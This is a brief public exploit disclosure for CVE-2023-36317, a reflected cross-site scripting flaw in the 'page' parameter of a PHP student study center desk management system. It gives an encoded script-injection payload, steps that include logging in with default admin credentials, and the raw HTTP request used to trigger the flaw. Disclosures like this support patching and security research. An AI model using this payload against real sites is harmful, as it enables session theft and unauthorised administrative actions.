CVE-2023-36317

# Exploit Title: Student Study Center Desk Management System - Cross-Site Scripting (XSS)
# Date: 17/06/2023
# Exploit Author: Ujjwal Saran
# Vendor Homepage: https://www.sourcecodester.com
# Software Link: https://www.sourcecodester.com/php/16298/student-study-center-desk-management-system-using-php-oop-and-mysql-db-free-source-code
# Version: V1.0.0
# Tested on: Windows


use payload=%2f'%3balert(document.domain)%2f%2f

1.	visit-http://localhost/php-sscdms/admin/login.php

2.	login Admin Doctor account with default credential

3.	Click left on Students option

4.	Put XSS payload in url on "Page" parameter 

5.	capture request and put payload 




Request

GET /php-sscdms/admin/?page=%2f'%3balert(document.domain)%2f%2f HTTP/1.1
Host: localhost
Cache-Control: max-age=0
sec-ch-ua: " Not A;Brand";v="99", "Chromium";v="104"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.102 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/php-sscdms/admin/?page=assign
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Cookie: PHPSESSID=02kfvleeri3ami25pt1nk6mdlg
Connection: close